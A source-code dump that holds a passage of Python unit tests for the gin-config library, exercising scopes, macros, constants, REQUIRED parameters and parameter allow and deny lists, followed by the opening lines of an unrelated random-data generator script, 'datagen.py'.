    # ...and include the scope when the reference was scoped.
    expected_msg_regexp = r"'broken_function' \(<.*\) in scope 'scoped'$"
    with six.assertRaisesRegex(self, TypeError, expected_msg_regexp):
      ConfigurableClass()  # pylint: disable=no-value-for-parameter
  def testOperativeConfigStr(self):
    """operative_config_str() matches the golden string after configurables run."""
    config_str = """
        import gin.testdata.import_test_configurables
        configurable1.kwarg1 = \\
            'a super duper extra double very wordy string that is just plain long'
        configurable1.kwarg3 = @configurable2
        configurable2.non_kwarg = 'ferret == domesticated polecat'
        ConfigurableClass.kwarg1 = 'statler'
        ConfigurableClass.kwarg2 = 'waldorf'
        ConfigurableSubclass.kwarg1 = 'waldorf'
        ConfigurableSubclass.kwarg3 = 'ferret'
        test/scopes/ConfigurableClass.kwarg2 = 'beaker'
        var_arg_fn.non_kwarg2 = {
            'long': [
                'nested', 'structure', ('that', 'will', 'span'),
                'more', ('than', 1), 'line',
            ]
        }
        var_arg_fn.any_name_is_ok = [%THE_ANSWER, %super/sweet, %pen_names]
        var_arg_fn.float_value = 2.718
        var_arg_fn.dict_value = {'success': True}
        super/sweet = 'lugduname'
        pen_names = ['Pablo Neruda', 'Voltaire', 'Snoop Lion']
        a.woolly.sheep.dolly.kwarg = 0
    """
    config.constant('THE_ANSWER', 42)
    config.parse_config(config_str)
    config.finalize()
    # Exercise each configurable so its parameters enter the operative config.
    fn1('mustelid')
    # pylint: disable=no-value-for-parameter
    configurable2(kwarg1='I am supplied explicitly.')
    # pylint: enable=no-value-for-parameter
    ConfigurableClass()
    ConfigurableSubclass()
    with config.config_scope('test'):
      with config.config_scope('scopes'):
        ConfigurableClass()
    var_arg_fn('non_kwarg1_value')  # pylint: disable=no-value-for-parameter
    no_arg_fn()
    clone2()
    applied_config_lines = config.operative_config_str().splitlines()
    # See the definition of _EXPECTED_OPERATIVE_CONFIG_STR at top of file.
    expected_config_lines = _EXPECTED_OPERATIVE_CONFIG_STR.splitlines()
    # [1:] skips the golden string's leading newline.
    self.assertEqual(applied_config_lines, expected_config_lines[1:])
  def testConfigStr(self):
    """config_str() matches the golden string (no calls needed, unlike operative)."""
    config_str = """
        import gin.testdata.import_test_configurables
        configurable1.kwarg1 = \\
            'a super duper extra double very wordy string that is just plain long'
        configurable1.kwarg3 = @configurable2
        configurable2.non_kwarg = 'ferret == domesticated polecat'
        ConfigurableClass.kwarg1 = 'statler'
        ConfigurableClass.kwarg2 = 'waldorf'
        ConfigurableSubclass.kwarg1 = 'waldorf'
        ConfigurableSubclass.kwarg3 = 'ferret'
        test/scopes/ConfigurableClass.kwarg2 = 'beaker'
        var_arg_fn.non_kwarg2 = {
            'long': [
                'nested', 'structure', ('that', 'will', 'span'),
                'more', ('than', 1), 'line',
            ]
        }
        var_arg_fn.any_name_is_ok = [%THE_ANSWER, %super/sweet, %pen_names]
        var_arg_fn.float_value = 2.718
        var_arg_fn.dict_value = {'success': True}
        super/sweet = 'lugduname'
        pen_names = ['Pablo Neruda', 'Voltaire', 'Snoop Lion']
        a.woolly.sheep.dolly.kwarg = 0
    """
    config.constant('THE_ANSWER', 42)
    config.parse_config(config_str)
    config.finalize()
    config_lines = config.config_str().splitlines()
    # See the definition of _EXPECTED_CONFIG_STR at top of file.
    expected_config_lines = _EXPECTED_CONFIG_STR.splitlines()
    # [1:] skips the golden string's leading newline.
    self.assertEqual(config_lines, expected_config_lines[1:])
  def testOperativeConfigStrHandlesOverrides(self):
    """Operative config records a configurable's params only once it is called."""
    config_str = """
        ConfigurableClass.kwarg1 = 'base_kwarg1'
        ConfigurableClass.kwarg2 = 'base_kwarg2'
        ConfigurableSubclass.kwarg1 = 'sub_kwarg1'
    """
    config.parse_config(config_str)
    ConfigurableSubclass()
    # Initially, since ConfigurableClass had all of its parameters overwritten,
    # none of them are logged to the operative config.
    selector = config._REGISTRY.get_match('ConfigurableClass').selector
    self.assertEqual(config._OPERATIVE_CONFIG['', selector], {})
    selector = config._REGISTRY.get_match('ConfigurableSubclass').selector
    self.assertEqual(config._OPERATIVE_CONFIG['', selector],
                     {'kwarg1': 'sub_kwarg1',
                      'kwarg2': None,
                      'kwarg3': None})
    ConfigurableClass()
    # Now that it's been called, we can see its parameters.
    selector = config._REGISTRY.get_match('ConfigurableClass').selector
    self.assertEqual(config._OPERATIVE_CONFIG['', selector],
                     {'kwarg1': 'base_kwarg1', 'kwarg2': 'base_kwarg2'})
    ConfigurableSubclass()
    # And they're still around after another call to the subclass.
    self.assertEqual(config._OPERATIVE_CONFIG['', selector],
                     {'kwarg1': 'base_kwarg1', 'kwarg2': 'base_kwarg2'})
  def testParsingOperativeConfigStrIsIdempotent(self):
    """Re-parsing an operative config string reproduces the same operative config."""
    config_str = """
        configurable1.kwarg1 = \\
            'a super duper extra double very wordy string that is just plain long'
        configurable1.kwarg3 = @configurable2
        configurable2.non_kwarg = 'ferret == domesticated polecat'
        ConfigurableClass.kwarg1 = 'statler'
        ConfigurableClass.kwarg2 = 'waldorf'
        ConfigurableSubclass.kwarg1 = 'subclass_kwarg1'
        ConfigurableSubclass.kwarg3 = 'subclass_kwarg3'
        test/scopes/ConfigurableClass.kwarg2 = 'beaker'
        var_arg_fn.non_kwarg2 = {
            'long': [
                'nested', 'structure', ('that', 'will', 'span'),
                'more', ('than', 1), 'line',
            ]
        }
        var_arg_fn.any_name_is_ok = [1, 2, 3]
        var_arg_fn.float_value = 2.718
        var_arg_fn.dict_value = {'success': True}
    """
    config.parse_config(config_str)
    def call_configurables():
      # Exercise every configurable so its params enter the operative config.
      fn1('mustelid')
      # pylint: disable=no-value-for-parameter
      configurable2(kwarg1='I am supplied explicitly.')
      # pylint: enable=no-value-for-parameter
      ConfigurableClass()
      ConfigurableSubclass()
      with config.config_scope('test'):
        with config.config_scope('scopes'):
          ConfigurableClass()
      var_arg_fn('non_kwarg1_value')  # pylint: disable=no-value-for-parameter
    call_configurables()
    operative_config_str = config.operative_config_str()
    # Round-trip: clear, re-parse the emitted config, re-run, compare.
    config.clear_config()
    config.parse_config(operative_config_str)
    call_configurables()
    self.assertEqual(config.operative_config_str(), operative_config_str)
  def testWhitelist(self):
    """Only whitelisted parameters may be bound; others raise ValueError."""
    config.bind_parameter('whitelisted_configurable.whitelisted', 0)
    self.assertEqual(whitelisted_configurable(), (0, None))
    config.bind_parameter('scope/whitelisted_configurable.whitelisted', 1)
    with config.config_scope('scope'):
      self.assertEqual(whitelisted_configurable(), (1, None))
    with self.assertRaises(ValueError):
      config.bind_parameter('whitelisted_configurable.other', 0)
    with self.assertRaises(ValueError):
      config.bind_parameter('a/b/whitelisted_configurable.other', 0)
  def testBlacklist(self):
    """Blacklisted parameters may not be bound; others work normally."""
    config.bind_parameter('blacklisted_configurable.other', 0)
    self.assertEqual(blacklisted_configurable(), (None, 0))
    config.bind_parameter('scope/blacklisted_configurable.other', 1)
    with config.config_scope('scope'):
      self.assertEqual(blacklisted_configurable(), (None, 1))
    with self.assertRaises(ValueError):
      config.bind_parameter('blacklisted_configurable.blacklisted', 0)
    with self.assertRaises(ValueError):
      config.bind_parameter('a/b/blacklisted_configurable.blacklisted', 0)
  def testRequiredArgs(self):
    """config.REQUIRED positionals raise until bindings supply them."""
    with self.assertRaisesRegex(RuntimeError, 'arg1.*arg2'):
      required_args(config.REQUIRED, config.REQUIRED, 3)
    config.bind_parameter('scope/required_args.arg1', 1)
    config.bind_parameter('scope/required_args.arg2', 2)
    with config.config_scope('scope'):
      self.assertEqual(
          required_args(config.REQUIRED, config.REQUIRED, 3),
          (1, 2, 3, 4, 5, 6))
  def testRequiredArgsWithVargs(self):
    """REQUIRED positionals work alongside *args and **kwargs."""
    with self.assertRaisesRegex(RuntimeError, 'arg1.*arg2'):
      required_with_vargs(config.REQUIRED, config.REQUIRED, 3, 4, 5, kwarg1=6)
    config.bind_parameter('scope/required_with_vargs.arg1', 1)
    config.bind_parameter('scope/required_with_vargs.arg2', 2)
    with config.config_scope('scope'):
      expected = (1, 2, 3, (4, 5), {'kwarg1': 6})
      actual = required_with_vargs(
          config.REQUIRED, config.REQUIRED, 3, 4, 5, kwarg1=6)
      self.assertEqual(expected, actual)
  def testRequiredDisallowedInVargs(self):
    """config.REQUIRED may not be passed inside *args."""
    with self.assertRaisesRegex(ValueError, 'not allowed'):
      required_with_vargs(1, 2, 3, config.REQUIRED)
  def testRequiredKwargs(self):
    """REQUIRED keyword arguments raise until bindings supply them."""
    with self.assertRaisesRegex(RuntimeError, 'kwarg1.*kwarg2|kwarg2.*kwarg1'):
      required_args(1, 2, 3, kwarg1=config.REQUIRED, kwarg2=config.REQUIRED)
    config.bind_parameter('scope/required_args.kwarg1', 4)
    config.bind_parameter('scope/required_args.kwarg2', 5)
    with config.config_scope('scope'):
      self.assertEqual(
          required_args(
              1, 2, 3, kwarg1=config.REQUIRED, kwarg2=config.REQUIRED),
          (1, 2, 3, 4, 5, 6))
  def testRequiredArgsAndKwargs(self):
    """Mixed REQUIRED positionals and kwargs are all reported, then satisfied."""
    with self.assertRaisesRegex(RuntimeError,
                                'arg2.*kwarg1.*kwarg2|arg2.*kwarg2.*kwarg1'):
      required_args(
          1, config.REQUIRED, 3, kwarg1=config.REQUIRED, kwarg2=config.REQUIRED)
    config.bind_parameter('scope/required_args.arg3', 3)
    config.bind_parameter('scope/required_args.kwarg2', 5)
    with config.config_scope('scope'):
      self.assertEqual(
          required_args(1, 2, config.REQUIRED, kwarg2=config.REQUIRED),
          (1, 2, 3, 4, 5, 6))
  def testRequiredArgsVkwargs(self):
    """REQUIRED works for names that land in **kwargs too."""
    with self.assertRaisesRegex(RuntimeError,
                                'arg2.*kwarg1.*kwarg6|arg2.*kwarg6.*kwarg1'):
      required_with_vkwargs(
          1, config.REQUIRED, 3, kwarg1=config.REQUIRED, kwarg6=config.REQUIRED)
    config.bind_parameter('scope/required_with_vkwargs.arg2', 2)
    config.bind_parameter('scope/required_with_vkwargs.kwarg1', 4)
    config.bind_parameter('scope/required_with_vkwargs.kwarg6', 7)
    with config.config_scope('scope'):
      expected = (1, 2, 3, 4, 5, 6, {'kwarg6': 7})
      actual = required_with_vkwargs(
          1, config.REQUIRED, 3, kwarg1=config.REQUIRED, kwarg6=config.REQUIRED)
      self.assertEqual(expected, actual)
  def testRequiredInSignature(self):
    """REQUIRED used as a parameter default must be satisfied by config."""
    expected_err_regexp = (
        r'Required bindings for `required_as_kwarg_default` not provided in '
        r"config: \['required_kwarg'\]")
    with self.assertRaisesRegex(RuntimeError, expected_err_regexp):
      required_as_kwarg_default('positional')
    # The same error is raised if the caller also passes REQUIRED explicitly.
    with self.assertRaisesRegex(RuntimeError, expected_err_regexp):
      required_as_kwarg_default('positional', required_kwarg=config.REQUIRED)
    # Passing REQUIRED for another arg adds it to the reported missing list.
    expected_err_regexp = r"config: \['positional_arg', 'required_kwarg'\]"
    with self.assertRaisesRegex(RuntimeError, expected_err_regexp):
      required_as_kwarg_default(config.REQUIRED, required_kwarg=config.REQUIRED)
    # Everything works if all values are passed.
    positional, kwarg = required_as_kwarg_default(
        'positional', required_kwarg='a value')
    # Even if not passed as a kwarg.
    positional, kwarg = required_as_kwarg_default('positional', 'a value')
    self.assertEqual(positional, 'positional')
    self.assertEqual(kwarg, 'a value')
  def testRequiredInSignatureBlacklistWhitelist(self):
    """A REQUIRED default conflicts with blacklisting/non-whitelisting that arg."""
    expected_err_regexp = (
        r"Argument 'arg' of 'test_required_blacklist' \('<function .+>'\) "
        r'marked REQUIRED but blacklisted.')
    with self.assertRaisesRegex(ValueError, expected_err_regexp):
      config.external_configurable(
          lambda arg=config.REQUIRED: arg,
          'test_required_blacklist',
          blacklist=['arg'])
    expected_err_regexp = (
        r"Argument 'arg' of 'test_required_whitelist' \('<function .+>'\) "
        r'marked REQUIRED but not whitelisted.')
    with self.assertRaisesRegex(ValueError, expected_err_regexp):
      config.external_configurable(
          lambda arg=config.REQUIRED, arg2=4: arg,
          'test_required_whitelist',
          whitelist=['arg2'])
  def testConfigScope(self):
    """config_scope nests, can be cleared with None, and validates its name."""
    config_str = """
        configurable2.non_kwarg = 'no_scope_arg_0'
        configurable2.kwarg1 = 'no_scope_arg_1'
        scope_1/configurable2.non_kwarg = 'scope_1_arg_0'
        scope_1/configurable2.kwarg1 = 'scope_1_arg_1'
        scope_1/scope_2/configurable2.non_kwarg = 'scope_2_arg_0'
    """
    config.parse_config(config_str)
    # pylint: disable=no-value-for-parameter
    self.assertEqual(configurable2(), ('no_scope_arg_0', 'no_scope_arg_1'))
    with config.config_scope('scope_1'):
      self.assertEqual(configurable2(), ('scope_1_arg_0', 'scope_1_arg_1'))
      with config.config_scope('scope_2'):
        # Inner scope inherits kwarg1 from scope_1.
        self.assertEqual(configurable2(), ('scope_2_arg_0', 'scope_1_arg_1'))
        with config.config_scope(None):
          # None temporarily clears all active scopes.
          expected = ('no_scope_arg_0', 'no_scope_arg_1')
          self.assertEqual(configurable2(), expected)
        self.assertEqual(configurable2(), ('scope_2_arg_0', 'scope_1_arg_1'))
      self.assertEqual(configurable2(), ('scope_1_arg_0', 'scope_1_arg_1'))
    self.assertEqual(configurable2(), ('no_scope_arg_0', 'no_scope_arg_1'))
    # Test shorthand for nested scopes.
    with config.config_scope('scope_1/scope_2'):
      self.assertEqual(configurable2(), ('scope_2_arg_0', 'scope_1_arg_1'))
    with six.assertRaisesRegex(self, ValueError, 'Invalid value'):
      with config.config_scope(4):
        pass
    with six.assertRaisesRegex(self, ValueError, 'Invalid value'):
      with config.config_scope('inv@lid/scope/name!'):
        pass
    with six.assertRaisesRegex(self, ValueError, 'Invalid value'):
      with config.config_scope(0):
        pass
  def testImplicitScopes(self):
    """A scoped reference applies its scope's bindings when evaluated."""
    config_str = """
        configurable2.non_kwarg = 'no_scope_non_kwarg'
        configurable2.kwarg1 = 'no_scope_kwarg1'
        implicit_scope_1/configurable2.non_kwarg = '#1_non_kwarg'
        implicit_scope_1/configurable2.kwarg1 = '#1_kwarg1'
        implicit_scope_2/configurable2.kwarg1 = '#2_kwarg1'
        ConfigurableClass.kwarg1 = @implicit_scope_1/configurable2
        ConfigurableClass.kwarg2 = @implicit_scope_2/configurable2()
    """
    config.parse_config(config_str)
    value = ConfigurableClass()
    self.assertEqual(value.kwarg1(), ('#1_non_kwarg', '#1_kwarg1'))
    # Scope 2 only overrides kwarg1; non_kwarg falls back to the unscoped value.
    self.assertEqual(value.kwarg2, ('no_scope_non_kwarg', '#2_kwarg1'))
  def testExplicitVsImplicitScopes(self):
    """An implicit (reference) scope is unaffected by the active explicit scope."""
    config_str = """
        configurable2.non_kwarg = 'no_scope_non_kwarg'
        configurable2.kwarg1 = 'no_scope_kwarg1'
        explicit_scope/configurable2.non_kwarg = 'explicit_non_kwarg'
        explicit_scope/configurable2.kwarg1 = 'explicit_scope'
        implicit_scope/configurable2.kwarg1 = 'implicit_scope'
        ConfigurableClass.kwarg1 = @implicit_scope/configurable2
        ConfigurableClass.kwarg2 = @configurable2()
    """
    config.parse_config(config_str)
    value = ConfigurableClass()
    self.assertEqual(value.kwarg1(), ('no_scope_non_kwarg', 'implicit_scope'))
    self.assertEqual(value.kwarg2, ('no_scope_non_kwarg', 'no_scope_kwarg1'))
    with config.config_scope('explicit_scope'):
      value = ConfigurableClass()
    # The implicitly scoped reference keeps its own scope even when called
    # inside an explicit scope; the unscoped reference picks up the explicit
    # scope's bindings.
    self.assertEqual(value.kwarg1(), ('no_scope_non_kwarg', 'implicit_scope'))
    self.assertEqual(value.kwarg2, ('explicit_non_kwarg', 'explicit_scope'))
  def testScopingThreadSafety(self):
    """Scoped bindings remain consistent when exercised from many threads."""
    # pylint: disable=unused-variable
    @config.configurable(blacklist=['expected_value'])
    def sanity_check(expected_value, config_value=None):
      # Returns True only if this thread observed its own scope's binding.
      return expected_value == config_value
    # pylint: enable=unused-variable
    def validate_test_fn(output_list, index, test_fn):
      # Hammer the scoped configurable; any cross-thread scope leakage makes
      # the accumulated boolean False.
      for _ in range(10000):
        output_list[index] = output_list[index] and test_fn(index)
    @config.configurable
    def run_threaded_test_fns(test_fns):
      outputs = [True] * len(test_fns)
      threads = []
      for i, test_fn in enumerate(test_fns):
        args = (outputs, i, test_fn)
        thread = threading.Thread(target=validate_test_fn, args=args)
        threads.append(thread)
        thread.start()
      for thread in threads:
        thread.join()
      return outputs
    config_str = """
        scope0/sanity_check.config_value = 0
        scope1/sanity_check.config_value = 1
        scope2/sanity_check.config_value = 2
        scope3/sanity_check.config_value = 3
        run_threaded_test_fns.test_fns = [
            @scope0/sanity_check,
            @scope1/sanity_check,
            @scope2/sanity_check,
            @scope3/sanity_check,
        ]
    """
    config.parse_config(config_str)
    outputs = run_threaded_test_fns(config.REQUIRED)
    self.assertTrue(all(outputs))
  def testIterateReferences(self):
    """iterate_references finds references nested inside containers."""
    config_str = """
        configurable2.non_kwarg = [
            {'so': @much/macro()},
            (@nesting/macro(),)
        ]
        configurable2.kwarg1 = {
            'nesting': {'like': ['a', (@pufferfish/macro(),)]}
        }
    """
    config.parse_config(config_str)
    macros = list(config.iterate_references(config._CONFIG, to=config.macro))
    # One per @.../macro() reference above, however deeply nested.
    self.assertLen(macros, 3)
  def testInteractiveMode(self):
    """interactive_mode allows redefining a configurable name; outside it, not."""
    @config.configurable('duplicate_fn')
    def duplicate_fn1():  # pylint: disable=unused-variable
      return 'duplicate_fn1'
    # Outside interactive mode, re-registering the same name is an error.
    with six.assertRaisesRegex(self, ValueError, 'A configurable matching'):
      @config.configurable('duplicate_fn')
      def duplicate_fn2():  # pylint: disable=unused-variable
        pass
    config_str = """
        ConfigurableClass.kwarg1 = @duplicate_fn()
    """
    config.parse_config(config_str)
    self.assertEqual(ConfigurableClass().kwarg1, 'duplicate_fn1')
    with config.interactive_mode():
      # Inside interactive mode, redefinition replaces the registration.
      @config.configurable('duplicate_fn')
      def duplicate_fn3():  # pylint: disable=unused-variable
        return 'duplicate_fn3'
    # Leaving interactive mode restores the no-duplicates rule.
    with six.assertRaisesRegex(self, ValueError, 'A configurable matching'):
      @config.configurable('duplicate_fn')
      def duplicate_fn4():  # pylint: disable=unused-variable
        pass
    config_str = """
        ConfigurableClass.kwarg1 = @duplicate_fn()
    """
    config.parse_config(config_str)
    self.assertEqual(ConfigurableClass().kwarg1, 'duplicate_fn3')
  def testFinalizeLocksConfig(self):
    """After finalize(), parsing, binding, and registering all raise."""
    config.finalize()
    with self.assertRaises(RuntimeError):
      config.parse_config('configurable2.non_kwarg = 3')
    with self.assertRaises(RuntimeError):
      config.bind_parameter('configurable2.non_kwarg', 3)
    with self.assertRaises(RuntimeError):
      @config.configurable
      def bah():  # pylint: disable=unused-variable
        pass
    with self.assertRaises(RuntimeError):
      config.external_configurable(RuntimeError)
  def testUnlockConfig(self):
    """unlock_config temporarily permits changes, then restores the lock."""
    with config.unlock_config():
      pass
    # Unlocking an unlocked config should not lock it.
    self.assertFalse(config.config_is_locked())
    config.finalize()
    with config.unlock_config():
      config.parse_config('configurable2.kwarg1 = 3')
    self.assertTrue(config.config_is_locked())
    self.assertEqual(configurable2(1), (1, 3))
  def testFinalizeHooks(self):
    """Finalize hooks can inject bindings; conflicting hooks raise ValueError."""
    self.skipTest('b/137302565')
    # Save/restore the global hook list so this test is self-contained.
    old_finalize_hooks = config._FINALIZE_HOOKS[:]
    @config.register_finalize_hook
    def provide_binding(_):  # pylint: disable=unused-variable
      return {'configurable2.kwarg1': 5}
    _, kwarg = configurable2(None)
    self.assertIsNone(kwarg)
    config.finalize()
    # The hook's binding takes effect only after finalize().
    _, kwarg = configurable2(None)
    self.assertEqual(kwarg, 5)
    @config.register_finalize_hook
    def provide_conflicting_binding(_):  # pylint: disable=unused-variable
      # Provide a slightly different selector.
      return {'config_test.configurable2.kwarg1': 7}
    with self.assertRaises(ValueError), config.unlock_config():
      config.finalize()
    config._FINALIZE_HOOKS = old_finalize_hooks
  def testBasicMacro(self):
    """Values can be shared via the `macro` configurable and @scope/macro()."""
    config_str = """
        batch_size/macro.value = 512
        discriminator/num_layers/macro.value = 5
        configurable2.non_kwarg = @batch_size/macro()
        configurable2.kwarg1 = @discriminator/num_layers/macro()
    """
    config.parse_config(config_str)
    # pylint:disable=no-value-for-parameter
    batch_size, num_layers = configurable2()
    # pylint:enable=no-value-for-parameter
    self.assertEqual(batch_size, 512)
    self.assertEqual(num_layers, 5)
  def testOverwriteBasicMacro(self):
    """bind_parameter can overwrite a macro's value after parsing."""
    config_str = """
        batch_size/macro.value = 512
        discriminator/num_layers/macro.value = 5
        configurable2.non_kwarg = @batch_size/macro()
        configurable2.kwarg1 = @discriminator/num_layers/macro()
    """
    config.parse_config(config_str)
    config.bind_parameter('batch_size/macro.value', 256)
    config.bind_parameter('discriminator/num_layers/macro.value', 10)
    # pylint:disable=no-value-for-parameter
    batch_size, num_layers = configurable2()
    # pylint:enable=no-value-for-parameter
    self.assertEqual(batch_size, 256)
    self.assertEqual(num_layers, 10)
  def testSpecialMacroSyntax(self):
    """`name = value` plus `%name` is shorthand for the macro configurable."""
    config_str = """
        batch_size = 512
        discriminator/num_layers = 5
        configurable2.non_kwarg = %batch_size
        configurable2.kwarg1 = %discriminator/num_layers
    """
    config.parse_config(config_str)
    # pylint:disable=no-value-for-parameter
    batch_size, num_layers = configurable2()
    # pylint:enable=no-value-for-parameter
    self.assertEqual(batch_size, 512)
    self.assertEqual(num_layers, 5)
  def testOverwriteSpecialMacroSyntax(self):
    """bind_parameter('%name', ...) overwrites a shorthand macro."""
    config_str = """
        batch_size = 512
        discriminator/num_layers = 5
        configurable2.non_kwarg = %batch_size
        configurable2.kwarg1 = %discriminator/num_layers
    """
    config.parse_config(config_str)
    config.bind_parameter('%batch_size', 256)
    config.bind_parameter('%discriminator/num_layers', 10)
    # pylint:disable=no-value-for-parameter
    batch_size, num_layers = configurable2()
    # pylint:enable=no-value-for-parameter
    self.assertEqual(batch_size, 256)
    self.assertEqual(num_layers, 10)
  def testUncalledMacroAtFinalize(self):
    """finalize() rejects configs containing an uncalled @macro reference."""
    config_str = """
        batch_size/macro.value = 512
        configurable2.non_kwarg = ([{'batch_size': @batch_size/macro}],)
    """
    config.parse_config(config_str)
    with self.assertRaises(ValueError):
      config.finalize()
  def testModuleDisambiguation(self):
    """Same-named configurables are disambiguated by module-path suffixes."""
    with self.assertRaises(KeyError):
      config.bind_parameter('dolly.kwarg', 5)
    with self.assertRaises(KeyError):
      config.bind_parameter('sheep.dolly.kwarg', 5)
    with self.assertRaises(ValueError):
      # Make sure the default module isn't prepended if the module is supplied
      # as part of the configurable name.
      config.bind_parameter('__main__.a.fuzzy.sheep.dolly.kwarg', 5)
    config_str = """
        __main__.dolly.kwarg = ''
        furry.sheep.dolly.kwarg = 'bah'
        a.woolly.sheep.dolly.kwarg = 'baaah'
        fuzzy.sheep.dolly.kwarg = 'baaaaah'
        hairy.sheep.dolly.kwarg = 'baaaaaaah'
        cow/woolly.sheep.dolly.kwarg = 'mooo'
        reference/furry.sheep.dolly.kwarg = @cow/a.woolly.sheep.dolly()
    """
    config.parse_config(config_str)
    # Each clone resolves to the binding for its own module path.
    self.assertEqual(clone0(), '')
    self.assertEqual(clone1(), 'bah')
    self.assertEqual(clone2(), 'baaah')
    self.assertEqual(clone3(), 'baaaaah')
    self.assertEqual(clone4(), 'baaaaaaah')
    with config.config_scope('cow'):
      self.assertEqual(clone2(), 'mooo')
    with config.config_scope('reference'):
      self.assertEqual(clone1(), 'mooo')
  def testConstant(self):
    """config.constant registers a %NAME macro preserving object identity."""
    value = 'istanbul'
    config.constant('CONSTANTINOPLE', value)
    config_str = """
        configurable2.non_kwarg = %CONSTANTINOPLE
    """
    config.parse_config(config_str)
    non_kwarg, _ = configurable2()  # pylint: disable=no-value-for-parameter
    self.assertIs(non_kwarg, value)  # We should be getting the same object.
    with six.assertRaisesRegex(self, ValueError, 'Invalid constant selector'):
      config.constant('CONST@NTINOPLE', 0)
  def testConstantModuleDisambiguation(self):
    """Constants with the same name need a module prefix unless unambiguous."""
    config.constant('foo.PI', 3.14)
    config.constant('bar.PI', 22/7)
    config.constant('bar.E', 2.718)
    with self.assertRaises(ValueError):
      # %PI is ambiguous between foo.PI and bar.PI.
      config.parse_config('configurable2.non_kwarg = %PI')
    config_str = """
        configurable2.non_kwarg = %foo.PI
        configurable2.kwarg1 = %bar.PI
        ConfigurableClass.kwarg1 = %E
        ConfigurableClass.kwarg2 = %bar.E
    """
    config.parse_config(config_str)
    non_kwarg, kwarg1 = configurable2()  # pylint: disable=no-value-for-parameter
    self.assertEqual(non_kwarg, 3.14)
    self.assertEqual(kwarg1, 22/7)
    configurable_class = ConfigurableClass()
    # %E is unambiguous (only bar.E exists), so both forms resolve identically.
    self.assertEqual(configurable_class.kwarg1, 2.718)
    self.assertEqual(configurable_class.kwarg2, 2.718)
  def testSingletons(self):
    """Each singleton scope yields one shared instance; non-callable ctors fail."""
    config_str = """
        ConfigurableClass.kwarg1 = @obj1/singleton()
        ConfigurableClass.kwarg2 = @obj2/singleton()
        error/ConfigurableClass.kwarg1 = @not_callable/singleton()
        obj1/singleton.constructor = @new_object
        obj2/singleton.constructor = @new_object
        not_callable/singleton.constructor = @new_object()
    """
    config.parse_config(config_str)
    class1 = ConfigurableClass()
    class2 = ConfigurableClass()
    # Same singleton scope -> same object across separate instantiations.
    self.assertIs(class1.kwarg1, class2.kwarg1)
    self.assertIs(class1.kwarg2, class2.kwarg2)
    # Different singleton scopes -> distinct objects.
    self.assertIsNot(class1.kwarg1, class1.kwarg2)
    self.assertIsNot(class2.kwarg1, class2.kwarg2)
    with config.config_scope('error'):
      # @new_object() bound an *instance* as the constructor, which is invalid.
      expected = "The constructor for singleton 'not_callable' is not callable."
      with six.assertRaisesRegex(self, ValueError, expected):
        ConfigurableClass()
  def testQueryParameter(self):
    """query_parameter returns bound values and rejects invalid/unset selectors."""
    config.bind_parameter('whitelisted_configurable.whitelisted', 0)
    value = config.query_parameter('whitelisted_configurable.whitelisted')
    self.assertEqual(0, value)
    with self.assertRaises(ValueError):
      config.query_parameter('whitelisted_configurable.wrong_param')
    with self.assertRaises(ValueError):
      config.query_parameter('blacklisted_configurable.blacklisted')
    with self.assertRaises(ValueError):
      # Parameter not set.
      config.query_parameter('whitelisted_configurable.other')
    with six.assertRaisesRegex(self, TypeError, 'expected string*'):
      config.query_parameter(4)
  def testQueryConstant(self):
    """query_parameter resolves constants, requiring a module when ambiguous."""
    config.constant('Euler', 0.5772156649)
    self.assertEqual(0.5772156649, config.query_parameter('Euler'))
    config.constant('OLD.ANSWER', 0)
    config.constant('NEW.ANSWER', 10)
    with six.assertRaisesRegex(
        self, ValueError, 'Ambiguous constant selector*'):
      config.query_parameter('ANSWER')
    self.assertEqual(0, config.query_parameter('OLD.ANSWER'))
    self.assertEqual(10, config.query_parameter('NEW.ANSWER'))
  def testConstantsFromEnum(self):
    """constants_from_enum exposes enum members as %module.Enum.MEMBER macros."""
    @config.constants_from_enum(module='enum_module')
    class SomeEnum(enum.Enum):
      # NOTE(review): the trailing comma makes A's value the tuple (0,), not
      # the int 0 — confirm this is intentional.
      A = 0,
      B = 1
    @config.configurable
    def f(a, b):
      return a, b
    config.parse_config("""
        f.a = %enum_module.SomeEnum.A
        f.b = %SomeEnum.B
    """)
    # pylint: disable=no-value-for-parameter
    a, b = f()
    # pylint: enable=no-value-for-parameter
    self.assertEqual(SomeEnum.A, a)
    self.assertEqual(SomeEnum.B, b)
  def testConstantsFromEnumWithModule(self):
    """constants_from_enum also works as a plain call with an explicit module."""

    class SomeOtherEnum(enum.Enum):
      # Trailing comma again makes A's value the tuple (0,); identity-only asserts.
      A = 0,
      B = 1

    @config.configurable
    def g(a, b):
      return a, b
    # Register after class creation, under the 'TestModule' namespace.
    config.constants_from_enum(SomeOtherEnum, module='TestModule')
    config.parse_config("""
      g.a = %TestModule.SomeOtherEnum.A
      g.b = %SomeOtherEnum.B
    """)
    # pylint: disable=no-value-for-parameter
    a, b = g()
    # pylint: enable=no-value-for-parameter
    self.assertEqual(SomeOtherEnum.A, a)
    self.assertEqual(SomeOtherEnum.B, b)
  def testConstantsFromEnumNotEnum(self):
    """Decorating a class that is not an enum.Enum subclass raises TypeError."""
    expected_msg = "Class 'FakeEnum' is not subclass of enum."
    with six.assertRaisesRegex(self, TypeError, expected_msg):
      # pylint: disable=unused-variable
      @config.constants_from_enum
      class FakeEnum(object):
        A = 0,
        B = 1
  def testAddConfigPath(self):
    """A gin file becomes findable after its directory joins the search path."""
    gin_file = 'test_gin_file_location_prefix.gin'
    # Not on the search path yet: parsing must fail with IOError.
    with self.assertRaises(IOError):
      config.parse_config_files_and_bindings([gin_file], None)
    test_srcdir = absltest.get_default_test_srcdir()
    relative_testdata_path = 'gin/testdata'
    absolute_testdata_path = os.path.join(test_srcdir, relative_testdata_path)
    config.add_config_file_search_path(absolute_testdata_path)
    # Same call now succeeds because the file is resolved via the new path.
    config.parse_config_files_and_bindings([gin_file], None)
if __name__ == '__main__':
  # Run all test cases via absl's test runner.
  absltest.main()
|
datagen.py | #!/usr/bin/env python
from argparse import ArgumentParser
import sys
import os
from random import randint, uniform, choice
import string
from datetime import datetime, timedelta
import operator
import csv
from threading import Thread
import gzip
__author__ = 'franklinsijo'
class DataGen(object):
    """Generates files of random delimited data, sized either by total bytes
    (``--size``) or by total row count (``--records``).

    Fixes over the previous revision: attribute names are used consistently
    (the old code read ``self.SIZE``/``self.TARGET_PATH``/... which were never
    set), the threading options are actually stored, Python 3 syntax is used
    (``range``, ``print()``), invalid size units raise instead of silently
    leaving ``self.size`` unset, and CSV output is opened in text mode.
    """

    ALLOWED_UNITS = ['K', 'M', 'G', 'T']
